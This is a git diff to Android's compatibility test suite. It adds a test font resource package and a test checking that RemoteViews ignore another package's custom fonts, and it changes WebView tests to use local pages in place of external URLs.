* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -12,15 +13,13 @@
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
- */
-package android.security.cts;
+ -->
-import android.content.Context;
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.text.cts.resources" >
-public class CVE_2021_0322_SliceProvider extends android.app.slice.SliceProvider {
+ <application>
+ <activity android:name="android.text.cts.MainActivity" />
+ </application>
- @Override
- public boolean onCreate() {
- return true;
- }
-}
+</manifest>
diff --git a/tests/tests/text/resourceApk/assets/a3em.ttx b/tests/tests/text/resourceApk/assets/a3em.ttx
new file mode 100644
index 0000000..3a686b2
--- /dev/null
+++ b/tests/tests/text/resourceApk/assets/a3em.ttx
@@ -0,0 +1,180 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!-- Copyright (C) 2021 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+<ttFont sfntVersion="\x00\x01\x00\x00" ttLibVersion="3.0">
+
+ <GlyphOrder>
+ <GlyphID id="0" name=".notdef"/>
+ <GlyphID id="1" name="a"/>
+ </GlyphOrder>
+
+ <head>
+ <tableVersion value="1.0"/>
+ <fontRevision value="1.0"/>
+ <checkSumAdjustment value="0x640cdb2f"/>
+ <magicNumber value="0x5f0f3cf5"/>
+ <flags value="00000000 00000011"/>
+ <unitsPerEm value="1000"/>
+ <created value="Fri Mar 17 07:26:00 2017"/>
+ <macStyle value="00000000 00000000"/>
+ <lowestRecPPEM value="7"/>
+ <fontDirectionHint value="2"/>
+ <glyphDataFormat value="0"/>
+ </head>
+
+ <hhea>
+ <tableVersion value="1.0"/>
+ <ascent value="1000"/>
+ <descent value="-200"/>
+ <lineGap value="0"/>
+ <caretSlopeRise value="1"/>
+ <caretSlopeRun value="0"/>
+ <caretOffset value="0"/>
+ <reserved0 value="0"/>
+ <reserved1 value="0"/>
+ <reserved2 value="0"/>
+ <reserved3 value="0"/>
+ <metricDataFormat value="0"/>
+ </hhea>
+
+ <maxp>
+ <tableVersion value="0x10000"/>
+ <maxZones value="0"/>
+ <maxTwilightPoints value="0"/>
+ <maxStorage value="0"/>
+ <maxFunctionDefs value="0"/>
+ <maxInstructionDefs value="0"/>
+ <maxStackElements value="0"/>
+ <maxSizeOfInstructions value="0"/>
+ <maxComponentElements value="0"/>
+ </maxp>
+
+ <OS_2>
+ <!-- The fields 'usFirstCharIndex' and 'usLastCharIndex'
+ will be recalculated by the compiler -->
+ <version value="3"/>
+ <xAvgCharWidth value="594"/>
+ <usWeightClass value="400"/>
+ <usWidthClass value="5"/>
+ <fsType value="00000000 00001000"/>
+ <ySubscriptXSize value="650"/>
+ <ySubscriptYSize value="600"/>
+ <ySubscriptXOffset value="0"/>
+ <ySubscriptYOffset value="75"/>
+ <ySuperscriptXSize value="650"/>
+ <ySuperscriptYSize value="600"/>
+ <ySuperscriptXOffset value="0"/>
+ <ySuperscriptYOffset value="350"/>
+ <yStrikeoutSize value="50"/>
+ <yStrikeoutPosition value="300"/>
+ <sFamilyClass value="0"/>
+ <panose>
+ <bFamilyType value="0"/>
+ <bSerifStyle value="0"/>
+ <bWeight value="5"/>
+ <bProportion value="0"/>
+ <bContrast value="0"/>
+ <bStrokeVariation value="0"/>
+ <bArmStyle value="0"/>
+ <bLetterForm value="0"/>
+ <bMidline value="0"/>
+ <bXHeight value="0"/>
+ </panose>
+ <ulUnicodeRange1 value="00000000 00000000 00000000 00000001"/>
+ <ulUnicodeRange2 value="00000000 00000000 00000000 00000000"/>
+ <ulUnicodeRange3 value="00000000 00000000 00000000 00000000"/>
+ <ulUnicodeRange4 value="00000000 00000000 00000000 00000000"/>
+ <achVendID value="UKWN"/>
+ <fsSelection value="00000000 01000000"/>
+ <usFirstCharIndex value="32"/>
+ <usLastCharIndex value="122"/>
+ <sTypoAscender value="800"/>
+ <sTypoDescender value="-200"/>
+ <sTypoLineGap value="200"/>
+ <usWinAscent value="1000"/>
+ <usWinDescent value="200"/>
+ <ulCodePageRange1 value="00000000 00000000 00000000 00000001"/>
+ <ulCodePageRange2 value="00000000 00000000 00000000 00000000"/>
+ <sxHeight value="500"/>
+ <sCapHeight value="700"/>
+ <usDefaultChar value="0"/>
+ <usBreakChar value="32"/>
+ <usMaxContext value="0"/>
+ </OS_2>
+
+ <hmtx>
+ <mtx name=".notdef" width="500" lsb="93"/>
+ <mtx name="a" width="3000" lsb="93"/> <!-- 3em -->
+ </hmtx>
+
+ <cmap>
+ <tableVersion version="0"/>
+ <cmap_format_4 platformID="3" platEncID="10" language="0">
+ <map code="0x0061" name="a" />
+ </cmap_format_4>
+ </cmap>
+
+ <loca>
+ <!-- The 'loca' table will be calculated by the compiler -->
+ </loca>
+
+ <glyf>
+ <TTGlyph name=".notdef" xMin="0" yMin="0" xMax="0" yMax="0" />
+ <TTGlyph name="a" xMin="0" yMin="0" xMax="0" yMax="0" />
+ </glyf>
+
+ <name>
+ <namerecord nameID="0" platformID="3" platEncID="1" langID="0x409">
+ Copyright (C) 2017 The Android Open Source Project
+ </namerecord>
+ <namerecord nameID="1" platformID="3" platEncID="1" langID="0x409">
+ Sample Font
+ </namerecord>
+ <namerecord nameID="2" platformID="3" platEncID="1" langID="0x409">
+ Regular
+ </namerecord>
+ <namerecord nameID="4" platformID="3" platEncID="1" langID="0x409">
+ Sample Font
+ </namerecord>
+ <namerecord nameID="6" platformID="3" platEncID="1" langID="0x409">
+ SampleFont-Regular
+ </namerecord>
+ <namerecord nameID="13" platformID="3" platEncID="1" langID="0x409">
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ </namerecord>
+ <namerecord nameID="14" platformID="3" platEncID="1" langID="0x409">
+ http://www.apache.org/licenses/LICENSE-2.0
+ </namerecord>
+ </name>
+
+ <post>
+ <formatType value="3.0"/>
+ <italicAngle value="0.0"/>
+ <underlinePosition value="-75"/>
+ <underlineThickness value="50"/>
+ <isFixedPitch value="0"/>
+ <minMemType42 value="0"/>
+ <maxMemType42 value="0"/>
+ <minMemType1 value="0"/>
+ <maxMemType1 value="0"/>
+ </post>
+
+</ttFont>
diff --git a/tests/tests/text/resourceApk/res/font/a3em.ttf b/tests/tests/text/resourceApk/res/font/a3em.ttf
new file mode 100644
index 0000000..03e1347
--- /dev/null
+++ b/tests/tests/text/resourceApk/res/font/a3em.ttf
Binary files differ
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java b/tests/tests/text/resourceApk/res/layout/textview_layout.xml
similarity index 62%
copy from tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java
copy to tests/tests/text/resourceApk/res/layout/textview_layout.xml
index f32aa90..72efdc4 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java
+++ b/tests/tests/text/resourceApk/res/layout/textview_layout.xml
@@ -1,5 +1,6 @@
-/*
- * Copyright (C) 2020 The Android Open Source Project
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ * Copyright (C) 2021 The Android Open Source Project.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -12,15 +13,10 @@
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
- */
-package android.security.cts;
+ -->
+<TextView xmlns:android="http://schemas.android.com/apk/res/android"
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:fontFamily="@font/a3em"
+ android:text="aaa"/>
-import android.content.Context;
-
-public class CVE_2021_0322_SliceProvider extends android.app.slice.SliceProvider {
-
- @Override
- public boolean onCreate() {
- return true;
- }
-}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java b/tests/tests/text/resourceApk/src/android/text/cts/MainActivity.java
similarity index 67%
rename from tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java
rename to tests/tests/text/resourceApk/src/android/text/cts/MainActivity.java
index f32aa90..39850bb 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java
+++ b/tests/tests/text/resourceApk/src/android/text/cts/MainActivity.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2020 The Android Open Source Project
+ * Copyright (C) 2021 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -13,14 +13,10 @@
* See the License for the specific language governing permissions and
* limitations under the License.
*/
-package android.security.cts;
-import android.content.Context;
+package android.text.cts;
-public class CVE_2021_0322_SliceProvider extends android.app.slice.SliceProvider {
+import android.app.Activity;
- @Override
- public boolean onCreate() {
- return true;
- }
+public class MainActivity extends Activity {
}
diff --git a/tests/tests/text/src/android/text/cts/FontResourceTest.java b/tests/tests/text/src/android/text/cts/FontResourceTest.java
new file mode 100644
index 0000000..5821772
--- /dev/null
+++ b/tests/tests/text/src/android/text/cts/FontResourceTest.java
@@ -0,0 +1,102 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.text.cts;
+
+import static com.google.common.truth.Truth.assertThat;
+
+import android.content.Context;
+import android.platform.test.annotations.AppModeFull;
+import android.util.TypedValue;
+import android.view.LayoutInflater;
+import android.view.View;
+import android.widget.RemoteViews;
+import android.widget.TextView;
+
+import androidx.test.InstrumentationRegistry;
+import androidx.test.filters.SmallTest;
+import androidx.test.runner.AndroidJUnit4;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@AppModeFull
+@SmallTest
+@RunWith(AndroidJUnit4.class)
+public class FontResourceTest {
+
+ private static final int REMOTE_FONT_TEXT_WIDTH = 900;
+ private static final String RESOURCE_PACKAGE = "android.text.cts.resources";
+
+ private int getLayoutId() {
+ Context context = InstrumentationRegistry.getTargetContext();
+ int resID = 0;
+ try {
+ resID = context.createPackageContext(RESOURCE_PACKAGE, 0)
+ .getResources().getIdentifier(
+ "textview_layout",
+ "layout",
+ RESOURCE_PACKAGE);
+ } catch (Exception e) {
+ throw new RuntimeException(e);
+ }
+ assertThat(resID).isNotEqualTo(0);
+ return resID;
+ }
+
+ private TextView inflateWithRemoteViews(Context ctx) {
+ RemoteViews remoteViews = new RemoteViews(RESOURCE_PACKAGE, getLayoutId());
+ return (TextView) remoteViews.apply(ctx, null);
+ }
+
+ private TextView inflateWithInflator(Context ctx) {
+ LayoutInflater inflater = LayoutInflater.from(ctx);
+ return (TextView) inflater.inflate(getLayoutId(), null);
+ }
+
+ private int measureText(TextView textView) {
+ textView.setTextSize(TypedValue.COMPLEX_UNIT_PX, 100f); // make 1em = 100px
+ textView.measure(
+ View.MeasureSpec.makeMeasureSpec(0, View.MeasureSpec.UNSPECIFIED),
+ View.MeasureSpec.makeMeasureSpec(0, View.MeasureSpec.UNSPECIFIED));
+ return textView.getLayout().getWidth();
+ }
+
+ @Test
+ public void testRemoteResource() throws Exception {
+ Context context = InstrumentationRegistry.getTargetContext();
+
+ Context freeContext = context.createPackageContext(
+ RESOURCE_PACKAGE, Context.CONTEXT_IGNORE_SECURITY);
+ Context restrictContext = context.createPackageContext(
+ RESOURCE_PACKAGE, Context.CONTEXT_RESTRICTED);
+
+ // This expectation is for verifying the precondition of the test case. If the context
+ // ignores the security, loads the custom font and TextView gives the width with it. If the
+ // context is restricted, the custom font should not be loaded and TextView gives the width
+ // different from the one with the custom font.
+ // The custom font has 3em for "a" character. The text is "aaa", then 9em = 900px is the
+ // expected width.
+ assertThat(measureText(inflateWithInflator(freeContext)))
+ .isEqualTo(REMOTE_FONT_TEXT_WIDTH);
+ assertThat(measureText(inflateWithInflator(restrictContext)))
+ .isNotEqualTo(REMOTE_FONT_TEXT_WIDTH);
+
+ // The RemoteView should ignore the custom font files.
+ assertThat(measureText(inflateWithRemoteViews(context)))
+ .isNotEqualTo(REMOTE_FONT_TEXT_WIDTH);
+ }
+}
diff --git a/tests/tests/webkit/assets/webkit/page_with_link.html b/tests/tests/webkit/assets/webkit/page_with_link.html
index 50fb78a..4fbe869 100644
--- a/tests/tests/webkit/assets/webkit/page_with_link.html
+++ b/tests/tests/webkit/assets/webkit/page_with_link.html
@@ -15,6 +15,8 @@
<html>
<body>
- <a href="http://foo.com" id="link">a link</a>
+ <!-- This is a relative link to an arbitrary page also hosted on this
+ server. -->
+ <a href="/assets/webkit/test_blankPage.html" id="link">a link</a>
</body>
</html>
diff --git a/tests/tests/webkit/src/android/webkit/cts/TestHtmlConstants.java b/tests/tests/webkit/src/android/webkit/cts/TestHtmlConstants.java
index ac0283c..360895a 100644
--- a/tests/tests/webkit/src/android/webkit/cts/TestHtmlConstants.java
+++ b/tests/tests/webkit/src/android/webkit/cts/TestHtmlConstants.java
@@ -57,7 +57,11 @@
public static final String LOGIN_FORM_URL = "webkit/test_loginForm.html";
- public static final String EXT_WEB_URL1 = "http://www.example.com/";
+ // Note: tests should avoid loading external URLs if at all possible, since any changes to that
+ // public site (even if it doesn't currently exist) can affect test behavior. The ".test" TLD is
+ // OK because (1) it's reserved for testing by RFC2606 and (2) the test never navigates to this
+ // page.
+ public static final String EXT_WEB_URL1 = "http://www.example.test/";
public static final String PARAM_ASSET_URL = "webkit/test_queryparam.html";
public static final String ANCHOR_ASSET_URL = "webkit/test_anchor.html";
@@ -66,8 +70,9 @@
public static final String DATABASE_ACCESS_URL = "webkit/test_databaseaccess.html";
public static final String STOP_LOADING_URL = "webkit/test_stop_loading.html";
public static final String BLANK_TAG_URL = "webkit/blank_tag.html";
+ // A page with a link to an arbitrary page controlled by the test server (in this case,
+ // BLANK_PAGE_URL).
public static final String PAGE_WITH_LINK_URL = "webkit/page_with_link.html";
- public static final String URL_IN_PAGE_WITH_LINK = "http://foo.com/";
// Not a real page, just triggers a 404 response.
public static final String NON_EXISTENT_PAGE_URL = "webkit/generate_404.html";
public static final String BAD_IMAGE_PAGE_URL = "webkit/test_bad_image_url.html";
diff --git a/tests/tests/webkit/src/android/webkit/cts/WebViewClientTest.java b/tests/tests/webkit/src/android/webkit/cts/WebViewClientTest.java
index 81ea695..a99e9af 100644
--- a/tests/tests/webkit/src/android/webkit/cts/WebViewClientTest.java
+++ b/tests/tests/webkit/src/android/webkit/cts/WebViewClientTest.java
@@ -204,8 +204,10 @@
}
}.run();
assertEquals(mainCallCount, mainWebViewClient.getShouldOverrideUrlLoadingCallCount());
- assertEquals(
- TestHtmlConstants.URL_IN_PAGE_WITH_LINK, childWebViewClient.getLastShouldOverrideUrl());
+ // PAGE_WITH_LINK_URL has a link to BLANK_PAGE_URL (an arbitrary page also controlled by the
+ // test server)
+ assertEquals(mWebServer.getAssetUrl(TestHtmlConstants.BLANK_PAGE_URL),
+ childWebViewClient.getLastShouldOverrideUrl());
}
private void clickOnLinkUsingJs(final String linkId, WebViewOnUiThread webViewOnUiThread) {
